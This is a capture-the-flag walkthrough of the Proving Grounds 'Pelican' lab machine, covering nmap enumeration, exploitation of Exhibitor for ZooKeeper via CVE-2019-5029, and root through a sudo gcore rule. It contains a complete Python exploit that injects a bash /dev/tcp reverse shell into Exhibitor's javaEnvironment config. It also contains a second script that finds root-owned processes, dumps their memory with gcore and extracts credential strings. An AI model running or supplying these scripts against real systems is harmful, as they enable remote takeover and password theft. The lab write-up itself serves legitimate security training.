PG - Pelican

In this walkthrough, we go through the Pelican room from Proving Grounds. The room is rated Intermediate on the platform and consists of exploiting Exhibitor for ZooKeeper via CVE-2019-5029 for initial access, then abusing a passwordless sudo rule for the gcore binary to get root. So, let's get started without delay.

Machine Info:

Title: Pelican
IP address: 192.168.157.98
Difficulty: Intermediate
OS: Linux
Description: Pelican is an Intermediate Linux machine that is vulnerable to CVE-2019-5029 and requires its exploitation for the initial foothold. For the privilege escalation, the attacker has to abuse the gcore binary sudo misconfiguration to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan (-A: version detection, OS detection, default scripts and traceroute against the top 1000 TCP ports) and found multiple ports open: 22 (SSH), 139 and 445 (Samba), 631 (IPP/CUPS), 2222 (SSH, same host keys as port 22), 8080 (HTTP, Jetty) and 8081 (HTTP, nginx, which redirects to the Exhibitor UI on 8080). Port 53 showed as filtered.

$ sudo nmap -A 192.168.157.98
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-17 23:07 IST

Nmap scan report for 192.168.157.98
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.9p1: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2019-16905	4.4	https://vulners.com/cve/CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|_    	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
53/tcp   filtered domain
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp  open     ipp         CUPS 2.2
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
| vulners: 
|   cpe:/a:apple:cups:2.2: 
|     	CVE-2022-26691	7.2	https://vulners.com/cve/CVE-2022-26691
|     	PRION:CVE-2017-18190	5.0	https://vulners.com/prion/PRION:CVE-2017-18190
|     	CVE-2017-18190	5.0	https://vulners.com/cve/CVE-2017-18190
|     	PRION:CVE-2018-4300	4.3	https://vulners.com/prion/PRION:CVE-2018-4300
|     	CVE-2018-4300	4.3	https://vulners.com/cve/CVE-2018-4300
|     	PRION:CVE-2022-26691	4.0	https://vulners.com/prion/PRION:CVE-2022-26691
|     	PRION:CVE-2023-4504	3.7	https://vulners.com/prion/PRION:CVE-2023-4504
|     	CHAINGUARD:CVE-2023-4504	3.7	https://vulners.com/cgr/CHAINGUARD:CVE-2023-4504
|     	PRION:CVE-2017-18248	3.5	https://vulners.com/prion/PRION:CVE-2017-18248
|     	CVE-2017-18248	3.5	https://vulners.com/cve/CVE-2017-18248
|     	PRION:CVE-2023-34241	3.2	https://vulners.com/prion/PRION:CVE-2023-34241
|     	PRION:CVE-2023-32324	1.9	https://vulners.com/prion/PRION:CVE-2023-32324
|     	CHAINGUARD:CVE-2023-32324	1.9	https://vulners.com/cgr/CHAINGUARD:CVE-2023-32324
|     	PRION:CVE-2021-25317	1.7	https://vulners.com/prion/PRION:CVE-2021-25317
|_    	1337DAY-ID-30905	0.0	https://vulners.com/zdt/1337DAY-ID-30905	*EXPLOIT*
2222/tcp open     ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:7.9p1: 
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	PRION:CVE-2019-16905	4.4	https://vulners.com/prion/PRION:CVE-2019-16905
|     	CVE-2019-16905	4.4	https://vulners.com/cve/CVE-2019-16905
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	PRION:CVE-2019-6110	4.0	https://vulners.com/prion/PRION:CVE-2019-6110
|     	PRION:CVE-2019-6109	4.0	https://vulners.com/prion/PRION:CVE-2019-6109
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	PRION:CVE-2019-6111	2.6	https://vulners.com/prion/PRION:CVE-2019-6111
|     	PRION:CVE-2018-20685	2.6	https://vulners.com/prion/PRION:CVE-2018-20685
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|_    	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
8080/tcp open     http        Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
| vulners: 
|   cpe:/a:mortbay:jetty:1.0: 
|     	SSV:26121	7.8	https://vulners.com/seebug/SSV:26121	*EXPLOIT*
|     	PRION:CVE-2007-5614	7.5	https://vulners.com/prion/PRION:CVE-2007-5614
|     	PRION:CVE-2011-4461	5.0	https://vulners.com/prion/PRION:CVE-2011-4461
|     	PRION:CVE-2009-1523	5.0	https://vulners.com/prion/PRION:CVE-2009-1523
|     	CVE-2011-4461	5.0	https://vulners.com/cve/CVE-2011-4461
|     	CVE-2009-1523	5.0	https://vulners.com/cve/CVE-2009-1523
|     	CVE-2005-3747	5.0	https://vulners.com/cve/CVE-2005-3747
|     	PRION:CVE-2009-1524	4.3	https://vulners.com/prion/PRION:CVE-2009-1524
|     	PRION:CVE-2007-5613	4.3	https://vulners.com/prion/PRION:CVE-2007-5613
|_    	CVE-2009-1524	4.3	https://vulners.com/cve/CVE-2009-1524
8081/tcp open     http        nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.157.98:8080/exhibitor/v1/ui/index.html
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/17%OT=22%CT=1%CU=35697%PV=Y%DS=4%DC=T%G=Y%TM=65A810A
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10E%TI=Z%II=I%TS=A)OPS(O1=M5
OS:4EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O
OS:6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D
OS:F=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=E46
OS:3%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: pelican
|   NetBIOS computer name: PELICAN\x00
|   Domain name: \x00
|   FQDN: pelican
|_  System time: 2024-01-17T12:38:32-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-01-17T17:38:35
|_  start_date: N/A

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   200.59 ms 192.168.45.1
2   200.65 ms 192.168.45.254
3   201.28 ms 192.168.251.1
4   201.41 ms 192.168.157.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

  • Started enumeration with the Samba service, listing shares anonymously with smbclient. Found nothing worth exploring.

smbclient -N -L //192.168.157.98

  • Next, accessed the web server on port 8080. The root returns a Jetty 404, but the nginx redirect on port 8081 points at /exhibitor/v1/ui/index.html, where “Exhibitor for ZooKeeper” is running and its Config tab is reachable without authentication.

Initial Access:

  • Looked for known exploits for Exhibitor and found CVE-2019-5029, an OS command injection in the Config editor of the Exhibitor web UI (affected versions 1.0.9 through 1.7.1). Values entered in the javaEnvironment field are written to ZooKeeper's java.env, which the start script sources, so shell commands wrapped in backticks or $() are executed when Exhibitor (re)starts ZooKeeper. On Pelican the UI needs no authentication, so anyone who can reach port 8080 can push such a config.

  • Used the exploit below, passing the target host and port and our listener IP and port. Start a listener first (for example nc -lvnp 4444); the script pushes a config whose javaEnvironment carries the reverse-shell command, and once Exhibitor restarts ZooKeeper the shell connects back.

Exploit: https://github.com/thehunt1s0n/Exihibitor-RCE

./exploit.sh 192.168.157.98 8080 192.168.45.234 4444
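
The same injection as a small Python script, added here as a worked example; it is not the page's exploit.sh and not Exhibitor's own code. It assumes Exhibitor's REST endpoints GET /exhibitor/v1/config/get-state (whose JSON carries a config object) and POST /exhibitor/v1/config/set, that bash exists on the target, and that the injected javaEnvironment is sourced when ZooKeeper restarts. The payload is backgrounded with its output discarded so the $() substitution returns and the restart does not hang. looks_injected is the defender-side counterpart: the check a config audit or a parser of /config/set request bodies would apply.

```python
"""CVE-2019-5029 against Exhibitor: added example, not the exploit.sh the page links.

Assumed (not shown on the page): the Exhibitor REST endpoints
  GET  /exhibitor/v1/config/get-state  -> {"config": {...}, ...}
  POST /exhibitor/v1/config/set        <- the same config map as JSON
The javaEnvironment value is written to ZooKeeper's java.env, which the start
script sources, so $(...) inside it is expanded and run as the Exhibitor user
when ZooKeeper is (re)started.
"""
import json
import re
import sys
import urllib.request

SHELL_META = re.compile(r"\$\(|`")
SCRIPT_FIELDS = ("javaEnvironment", "log4jProperties")


def build_reverse_shell(lhost: str, lport: int) -> str:
    """Payload for javaEnvironment. The job is backgrounded and its stdout/stderr
    sent to /dev/null so the $(...) substitution returns and ZooKeeper still starts."""
    inner = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    return f"$(bash -c '{inner}' >/dev/null 2>&1 &)"


def inject_config(config: dict, payload: str) -> dict:
    """Copy of the live config with the payload in javaEnvironment; every other
    field is preserved so the POST is accepted and the cluster keeps its settings."""
    patched = dict(config)
    patched["javaEnvironment"] = payload
    return patched


def looks_injected(config: dict) -> bool:
    """Defender-side check: command substitution has no business in these fields."""
    return any(SHELL_META.search(str(config.get(f, ""))) for f in SCRIPT_FIELDS)


def get_state(base: str) -> dict:
    """Fetch the current Exhibitor state (assumed endpoint, see module docstring)."""
    with urllib.request.urlopen(f"{base}/exhibitor/v1/config/get-state", timeout=10) as r:
        return json.load(r)


def set_config(base: str, config: dict) -> bytes:
    """Push a config map (assumed endpoint, see module docstring)."""
    req = urllib.request.Request(
        f"{base}/exhibitor/v1/config/set",
        data=json.dumps(config).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.read()


def main(argv) -> int:
    if len(argv) != 5:
        print(f"usage: {argv[0]} RHOST RPORT LHOST LPORT", file=sys.stderr)
        return 2
    rhost, rport, lhost, lport = argv[1], int(argv[2]), argv[3], int(argv[4])
    base = f"http://{rhost}:{rport}"
    live = get_state(base)["config"]
    if looks_injected(live):
        print("[!] javaEnvironment already carries shell metacharacters", file=sys.stderr)
    set_config(base, inject_config(live, build_reverse_shell(lhost, lport)))
    print("[+] config pushed; wait for Exhibitor to restart ZooKeeper and check the listener")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 exhibitor_cve_2019_5029.py 192.168.157.98 8080 192.168.45.234 4444 with nc -lvnp 4444 already listening. Pulling the live config first and changing only javaEnvironment keeps serversSpec, the ports and the directories intact, so ZooKeeper still comes up after the restart instead of failing on a half-filled config.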

  • Captured the local flag from the home directory of the user charles.

Privilege Escalation:

  • Next, checked for sudo misconfigurations with the command below and found that we can run the gcore binary as root without a password.

sudo -l

  • Used the GTFOBins technique for gcore to elevate privileges. gcore (gdb's core-dump helper) attaches to a running process and writes its memory to disk; run through sudo it does so as root, so it can read the memory of any process, including secrets the process holds in cleartext. For that to be useful, we first need the process ID of a root-owned process worth dumping.

  • Found the process ID (8279) of the password-store binary running as root.

ps aux

  • Next, ran gcore via sudo against that PID, dumping all of its memory mappings (-a) to an output file. gcore appends the PID to the prefix given with -o, so the dump lands in /home/charles/output.8279.

sudo /usr/bin/gcore -a -o /home/charles/output 8279

  • Running strings over the dump reveals the root password in cleartext (piping through grep -i password narrows it down quickly).

strings output.8279
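
The escalation as one script, added here as an example that is not from the page or GTFOBins: it finds root-owned processes by name from /proc, dumps each through the sudo rule the page found, and scans the dump for credential-looking strings the way strings | grep does. The process name filter, the /home/charles output directory and the credential regex are assumptions; parse_status, harvest_strings and credential_candidates are pure functions that also run offline on constructed input.

```python
"""Added example: automate the gcore dump-and-scan privilege escalation.
Assumes the sudo rule from the page (charles may run /usr/bin/gcore as root);
the target process name and the output directory are placeholders."""
import re
import subprocess
from pathlib import Path

# Strings that look like a credential assignment, e.g. "Password: hunter2" or
# "db_pass=hunter2". A ':' or '=' separator is required so paths such as
# /usr/bin/password-store are not flagged.
SECRET_HINT = re.compile(r"(?i)(pass(word|wd)?|secret|token|api[_-]?key)\s*[:=]\s*\S+")


def harvest_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of strings(1): runs of printable ASCII at least min_len long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def credential_candidates(lines) -> list:
    """Keep only the strings that look like a credential."""
    return [line for line in lines if SECRET_HINT.search(line)]


def parse_status(text: str):
    """(comm, real uid) from a /proc/PID/status file. comm is truncated by the
    kernel to 15 characters, so callers match on a substring of the binary name."""
    name, uid = None, None
    for line in text.splitlines():
        if line.startswith("Name:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Uid:"):
            uid = int(line.split()[1])  # first column is the real uid
    return name, uid


def find_root_pids(name_substring: str) -> list:
    """PIDs whose real uid is 0 and whose comm contains name_substring."""
    hits = []
    for entry in Path("/proc").iterdir():
        if not entry.name.isdigit():
            continue
        try:
            name, uid = parse_status((entry / "status").read_text())
        except OSError:  # process exited between listing and read
            continue
        if uid == 0 and name and name_substring in name:
            hits.append(int(entry.name))
    return sorted(hits)


def dump_with_gcore(pid: int, outdir: str = "/home/charles") -> Path:
    """Run gcore as root through the sudo rule; -a dumps all mappings and
    gcore names the file <prefix>.<pid>. outdir is a placeholder."""
    prefix = Path(outdir) / "output"
    subprocess.run(["sudo", "/usr/bin/gcore", "-a", "-o", str(prefix), str(pid)], check=True)
    return Path(f"{prefix}.{pid}")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "password-store"  # placeholder name
    for pid in find_root_pids(target):
        dump = dump_with_gcore(pid)
        for line in credential_candidates(harvest_strings(dump.read_bytes())):
            print(f"[{pid}] {line}")
```

Matching on /proc/PID/status rather than on ps output avoids false hits on the grep command itself, and the separator requirement in SECRET_HINT is what keeps the binary's own path out of the candidate list.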

  • Switched to root with su using the recovered password and captured the root flag to mark the machine complete.

Conclusion:

So that was “Pelican” for you. We started off with a regular nmap scan and found multiple ports open: 22 (SSH), 139 and 445 (Samba), 631 (IPP), 2222 (SSH), 8080 (HTTP) and 8081 (HTTP). Enumerating the web server on port 8080 revealed “Exhibitor for ZooKeeper”. A search for known exploits showed it is vulnerable to CVE-2019-5029, which we used to get initial access. For privilege escalation, we abused the gcore sudo misconfiguration with the GTFOBins technique, dumping the memory of a root-owned process to recover the root password. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
